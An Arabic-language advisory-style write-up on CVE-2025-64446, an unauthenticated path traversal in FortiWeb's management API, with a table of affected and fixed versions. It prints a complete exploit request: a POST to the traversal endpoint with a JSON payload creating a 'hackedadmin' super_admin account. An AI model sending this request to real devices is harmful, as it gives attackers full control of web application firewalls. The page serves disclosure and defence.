
CVE-2025-64446

ثغرة حرجة غير موثقة تسمح للمهاجمين عن بُعد بإنشاء حسابات إدارة على أجهزة FortiWeb.
CVE-2025-64446 هي ثغرة اجتياز مسار نسبي خطيرة في واجهة إدارة جدار حماية تطبيقات الويب FortiWeb.
يمكن لمهاجم بعيد غير موثَّق استغلال هذا الخلل لتجاوز المصادقة وإنشاء مستخدمين إداريين جدد بصلاحيات كاملة، مما يؤدي إلى السيطرة الكاملة على الجهاز.
توصية: قم بالتحديث إلى أحدث إصدار مُصلَح في أقرب وقت ممكن.
تحديد الهدف
يقوم المهاجم بمسح واجهات إدارة FortiWeb المكشوفة للعامة (عادةً على منفذ HTTPS 443 أو 8443).
صياغة الطلب الخبيث
جوهر الاستغلال هو اجتياز مسار نسبي (../) مع عنوان URL مصمم خصيصًا يصل إلى نقطة نهاية CGI داخلية غير موثقة.
نمط النقطة النهائية القابلة للاستغلال:
/api/v2.0/cmdb/system/admin?.../../../../../../cgi-bin/fwbcgi
إرسال الاستغلال
يرسل المهاجم طلب POST واحد مع حمولة JSON لإنشاء حساب إداري جديد.
مثال لطلب الاستغلال:
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: target-fortiw eb.example.com
Content-Type: application/json
{
"name": "hackedadmin",
"password": "AttackerPass123!",
"access_profile": "super_admin",
"type": "local"
}
الاستغلال الناجح
في حالة النجاح، يقوم FortiWeb بإنشاء حساب الإدارة الجديد دون الحاجة إلى أي مصادقة مسبقة. يمكن للمهاجم بعد ذلك تسجيل الدخول باستخدام بيانات الاعتماد التي تم إنشاؤها حديثًا والسيطرة الكاملة على WAF.
يفشل واجهة برمجة التطبيقات (API) الخاصة بالإدارة في تعقيم المسار بشكل صحيح، مما يسمح للطلب بالعودة إلى الثنائي القديم fwbcgi الذي لا يفرض المصادقة على عمليات معينة.
fwbcgi أو ../ أو محاولات إنشاء إدارة غير عاديةلأغراض البحث الأمني التعليمي والدفاعي فقط.
مصنوع بـ ❤️ من أجل مجتمع الأمن السيبراني
آخر تحديث: أبريل 2026
| المنتج | الإصدارات المتأثرة | الإصدار المُصلَح |
|---|
| FortiWeb 8.0 | 8.0.0 – 8.0.1 | 8.0.2 وما فوق |
| FortiWeb 7.6 | 7.6.0 – 7.6.4 | 7.6.5 وما فوق |
| FortiWeb 7.4 | 7.4.0 – 7.4.9 | 7.4.10 وما فوق |
| FortiWeb 7.2 | 7.2.0 – 7.2.11 | 7.2.12 وما فوق |
| FortiWeb 7.0 | 7.0.0 – 7.0.11 | 7.0.12 وما فوق |